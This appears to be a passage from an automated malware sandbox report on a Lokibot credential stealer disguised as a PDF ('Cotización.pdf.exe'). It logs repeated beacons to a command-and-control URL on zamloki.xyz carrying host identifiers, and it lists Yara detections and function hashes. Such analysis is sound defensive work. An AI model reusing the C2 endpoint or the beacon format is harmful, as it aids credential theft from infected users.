                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      92192.168.2.349826172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:44:43.205039024 CEST5922OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:44:43.225652933 CEST5922OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:44:43.507025957 CEST5923INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:44:43 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=yo1jKXwhmmDtjl09l9cYNuSGoyuZAuktGbjuR7MmkVw2NhZqQZO6ERSA%2BmuY0Z4En95zh7kj039DrMWNPAHmHGDdvL%2BC0DR0r8%2BzeKQw8UcHyZRqvWpM8mw%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f265aa1d094ec8-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      93192.168.2.349827104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:44:43.739356041 CEST5924OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:44:43.757066965 CEST5924OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:44:43.996454954 CEST5925INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:44:43 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=P8CrT0UzQbaZGHRAwrwWPAxEV67BX8rClP4OMqp211PR5wAWGPTySa4ehHdvLVhJs74ebqa3Qf9uiMzvRwPgG%2F%2BCqayYDH6ixOykNGPfuBhp2BPZ3E5PYhSkwzyk%2FA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f265ad6f6696ce-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      94192.168.2.349828104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:44:44.242281914 CEST5926OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:44:44.262172937 CEST5926OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:44:44.507946968 CEST5927INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:44:44 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=0Y8J38c2mkgDgDtWVWP%2BsCMmn%2F5APYe8OcuP2oqu%2FWpqGlxv1hMu7%2BLXd2AdnP%2BxdFNdKQJ%2Flts01xDTQ1M1a1e%2F8yDpEABmA7LukJYsQHCd85az1xDynrY%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f265b098ab2bd2-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      95192.168.2.349829104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:44:44.738337040 CEST5928OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:44:44.756692886 CEST5928OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:44:44.997848034 CEST5934INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:44:44 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=Z%2FyO6mkVP0tqe3jIfZ04OSs9LAR7KRI9LkjeTkhmEeqU7Zskp%2BHOXwJWCDItSvYplOAIs9uLrMvgvJUJA6qNnWIAlat5sT%2BhQcJtNwL6a3XsB%2BxHRyE35H8%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f265b3af6d4ea4-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      96192.168.2.349831172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:44:45.255251884 CEST5938OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:44:45.272746086 CEST5938OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:44:45.513608932 CEST5939INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:44:45 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=IEYcjexLteLqu3LUBP4gCUqRmdERfAmyfufWp5LO3Li9vLSbc%2FiENVI%2FpIYc%2BuXLlB7dKZGgLmcjdObM7V5oXnTrqVfyR8v9s%2F6j7WBQrxvrMLEWjEMfSEQ%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f265b6e93e4e9e-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      97192.168.2.349832172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:44:45.794179916 CEST5940OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:44:45.813833952 CEST5940OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:44:46.069856882 CEST5941INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:44:46 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=HQpArPCMFkHaPnWOIAX5A3YeG8As08sbBJtu5i0WX4GjfZK7%2FQMVUt%2FPen3PJkcr7XovRhYpuQQO2of%2BuDZK4RmHIs1Mf99wDuxXck5gzQtxGLWv05XJpF8%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f265ba4edc1766-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      98192.168.2.349833104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:44:46.302136898 CEST5942OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:44:46.319705963 CEST5942OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:44:46.567293882 CEST5943INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:44:46 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=Ohg003D2zKK72GWUsOyGLhZiiNsNrVDdT3DvjRvKP9eFBsaoddwjrg1hzPw%2BCBnklPIr%2B51vDf%2F3%2FaSpldw2k36pLun3Q7DLppcTq%2F9v7PVa8NAvD1cNXuA%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f265bd7e1dd6d5-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      99192.168.2.349835172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:44:46.804553032 CEST5946OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:44:46.822132111 CEST5947OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:44:47.084750891 CEST5954INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:44:47 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=pB%2FQSwsZBWdKA6Zeaqer8y6JzY2HZCsrCaoTKyYSASCvH5KiZ74hP7j2DN967AMeGuylwciYg56E0eccATRrnmjJVTyzPL4BVt3npCpio%2BQcqfmv1ZOVrAE%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f265c09d1b05fd-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Code Manipulations

                                      Statistics

                                      CPU Usage

                                      Click to jump to process

                                      Memory Usage

                                      Click to jump to process

                                      High Level Behavior Distribution

                                      Click to dive into process behavior distribution

                                      Behavior

                                      Click to jump to process

                                      System Behavior

                                      Analysis Process: Cotizaci#U00f3n.pdf.exe PID: 1724 Parent PID: 5568

                                      General

                                      Start time:12:43:03
                                      Start date:15/07/2021
                                      Path:C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      Wow64 process (32bit):true
                                      Commandline:'C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe'
                                      Imagebase:0xff0000
                                      File size:556032 bytes
                                      MD5 hash:5E628AC4E53FD5B94632C03A7C43AED5
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:.Net C# or VB.NET
                                      Yara matches:
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.296339841.0000000003522000.00000004.00000001.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.296339841.0000000003522000.00000004.00000001.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.296339841.0000000003522000.00000004.00000001.sdmp, Author: Joe Security
                                      • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.296339841.0000000003522000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.298360317.0000000004697000.00000004.00000001.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.298360317.0000000004697000.00000004.00000001.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.298360317.0000000004697000.00000004.00000001.sdmp, Author: Joe Security
                                      • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.298360317.0000000004697000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                      Reputation:low

                                      Chronological Activities

                                      Analysis Process: Cotizaci#U00f3n.pdf.exe PID: 5436 Parent PID: 1724

                                      General

                                      Start time:12:43:46
                                      Start date:15/07/2021
                                      Path:C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      Wow64 process (32bit):true
                                      Commandline:{path}
                                      Imagebase:0x710000
                                      File size:556032 bytes
                                      MD5 hash:5E628AC4E53FD5B94632C03A7C43AED5
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000002.466439679.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000010.00000002.466439679.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000010.00000002.466439679.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                      • Rule: Loki_1, Description: Loki Payload, Source: 00000010.00000002.466439679.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                                      • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000010.00000002.466439679.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                      Reputation:low

                                      Chronological Activities

                                      Disassembly

                                      Code Analysis

                                      Reset < >

                                        Analysis Process: Cotizaci#U00f3n.pdf.exe PID: 1724 Parent PID: 5568 Cotizaci#U00f3n.pdf.exeCOMMON

                                        Executed Functions

                                        Function 07AD058F, Relevance: 2.2, Instructions: 2237COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.303276587.0000000007AD0000.00000040.00000001.sdmp, Offset: 07AD0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d802b8a3f5d79bdfa8b31a7e4b779f04c7ba8c2cfc3deeb7e6b017fc535e0b0c
                                        • Instruction ID: 0c38fd033d9dcb2cf444dc26b27ea65e662a9b89573ac0b2f1abfffecd02afe7
                                        • Opcode Fuzzy Hash: d802b8a3f5d79bdfa8b31a7e4b779f04c7ba8c2cfc3deeb7e6b017fc535e0b0c
                                        • Instruction Fuzzy Hash: 6F33DEB4A00119CFCB24DF64C884A9DB7B2BF89314F1685D9E51AAB3A5DB34ED81CF50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 07AD9EE8, Relevance: 1.5, Strings: 1, Instructions: 276COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.303276587.0000000007AD0000.00000040.00000001.sdmp, Offset: 07AD0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID: Wov
                                        • API String ID: 0-2169269483
                                        • Opcode ID: 67598ed278cd7ea85ce8cbc50910152d6ed69e19a3ed6302fa77a0205e68d2e0
                                        • Instruction ID: d87059da8c957fa2020e0b1b77b0062e85e86dec509b748dfacfc79afc95b1df
                                        • Opcode Fuzzy Hash: 67598ed278cd7ea85ce8cbc50910152d6ed69e19a3ed6302fa77a0205e68d2e0
                                        • Instruction Fuzzy Hash: 2DD16B74A02209CFDB14EFA9D58899DBBF2FF88714B04C8A5E41ADB264D738AD41CF51
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 07AD9EE6, Relevance: 1.5, Strings: 1, Instructions: 275COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.303276587.0000000007AD0000.00000040.00000001.sdmp, Offset: 07AD0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID: Wov
                                        • API String ID: 0-2169269483
                                        • Opcode ID: 68f915b772c37546a58c76fc24ff85abde5cb9a57407b9c78d8293e5414dd844
                                        • Instruction ID: c48960940588f77f469c9f46e4817206833bc985f5cc5495831957deaa46fd11
                                        • Opcode Fuzzy Hash: 68f915b772c37546a58c76fc24ff85abde5cb9a57407b9c78d8293e5414dd844
                                        • Instruction Fuzzy Hash: 81D17B74A01209CFDB14EFA9D58899DBBF2FF88714B04C8A5E41ADB264D738AD41CF51
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 07ADA370, Relevance: 1.5, Strings: 1, Instructions: 274COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.303276587.0000000007AD0000.00000040.00000001.sdmp, Offset: 07AD0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID: Wov
                                        • API String ID: 0-2169269483
                                        • Opcode ID: c15d0c88cea1c15bb16ef984b6711cc1a4511cdf38e5d8a2661259ce3bb2da72
                                        • Instruction ID: cccfb55f189f4b686e6a00984be5a44fd1de4d0186ecb7444aadab8325fae433
                                        • Opcode Fuzzy Hash: c15d0c88cea1c15bb16ef984b6711cc1a4511cdf38e5d8a2661259ce3bb2da72
                                        • Instruction Fuzzy Hash: 53C17AB0A12209DFDB14DFA9D58499DBBF2FF88704B04C8AAD419EB264D738AD40CF50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 07ADDAB9, Relevance: 1.5, Strings: 1, Instructions: 239COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.303276587.0000000007AD0000.00000040.00000001.sdmp, Offset: 07AD0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID: IUi
                                        • API String ID: 0-1606926691
                                        • Opcode ID: be24fd0c604b65bcb178b292df6498bff28ecf28b5a8a2a7f1ca0ea09a933982
                                        • Instruction ID: b730b7a94307483848b007c5640bccd82ae7155e97e13be0768bd387d9165dde
                                        • Opcode Fuzzy Hash: be24fd0c604b65bcb178b292df6498bff28ecf28b5a8a2a7f1ca0ea09a933982
                                        • Instruction Fuzzy Hash: 1491F7B4E1520ADFCB04DFE5D5419AEFBB2FF89310F10942AD426A7358E7349A028F95
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 07AD2C30, Relevance: .4, Instructions: 444COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.303276587.0000000007AD0000.00000040.00000001.sdmp, Offset: 07AD0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 666f6357ac045b6c304e180552c7a81c1d11d3d0889d2d8b45bfe40005351109
                                        • Instruction ID: 0d3d4f8778f3b0a1ca41e39c7aff7dea3999cdee12115177b8893e5d0e7a9cf7
                                        • Opcode Fuzzy Hash: 666f6357ac045b6c304e180552c7a81c1d11d3d0889d2d8b45bfe40005351109
                                        • Instruction Fuzzy Hash: A6F1A2B1A05215CFCB19CF69C494AADBBB2BF89300F198469D427AB3A5CB35DC41CB91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 07AD6C6D, Relevance: .4, Instructions: 370COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.303276587.0000000007AD0000.00000040.00000001.sdmp, Offset: 07AD0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: dcd0925f68a7207a87c6b13ab36f00650556ad7a8066e5c31f8d01f03774fa1e
                                        • Instruction ID: 369abd360da4f81bdc743bfbaad61f23db81bc092b6252002ebc0c7a39338c98
                                        • Opcode Fuzzy Hash: dcd0925f68a7207a87c6b13ab36f00650556ad7a8066e5c31f8d01f03774fa1e
                                        • Instruction Fuzzy Hash: 96E1D0B4E0560ACFCB04CFA5D4844EEFBB2FF8A350F14855AC426AB295D7349A46CF91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 07AD6CC6, Relevance: .4, Instructions: 355COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.303276587.0000000007AD0000.00000040.00000001.sdmp, Offset: 07AD0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 9114b0e77b360a5e369f9877c6fa6e42bda77def9bc09901fb1f78a964a71a72
                                        • Instruction ID: 3e49fdf00c300b984fde58645bd909bd3091e5f6077bc2e5ff2ffa01a30bd763
                                        • Opcode Fuzzy Hash: 9114b0e77b360a5e369f9877c6fa6e42bda77def9bc09901fb1f78a964a71a72
                                        • Instruction Fuzzy Hash: A7E1AEB0E1560ACFCB04CFA6D4804EEFBB2FF8A350F108556D466AB295C7349A46CF91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 07AD6D48, Relevance: .3, Instructions: 296COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.303276587.0000000007AD0000.00000040.00000001.sdmp, Offset: 07AD0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4b83ff00152c11975bb4ba7dadc10ed0a4623ecc1e456f6fc64da3772b985796
                                        • Instruction ID: 78c1119756bc11d2645bc0ce7fc1580b8b8f09d4534b8dccadca3730ba46c7ad
                                        • Opcode Fuzzy Hash: 4b83ff00152c11975bb4ba7dadc10ed0a4623ecc1e456f6fc64da3772b985796
                                        • Instruction Fuzzy Hash: 79D15CB0E1560ADFCB04CF96D4848AEFBB2FF89340F158559D426AB394D734AA46CF90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 07ADB260, Relevance: .3, Instructions: 266COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.303276587.0000000007AD0000.00000040.00000001.sdmp, Offset: 07AD0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b33cf2692da308e67a80438174e10f4e14cbd8753d7bf15f35fec6741b171776
                                        • Instruction ID: 1f4ab7b1bf540dec585d6988fed96e89f48d911422aaf3adad2f77f21c30794b
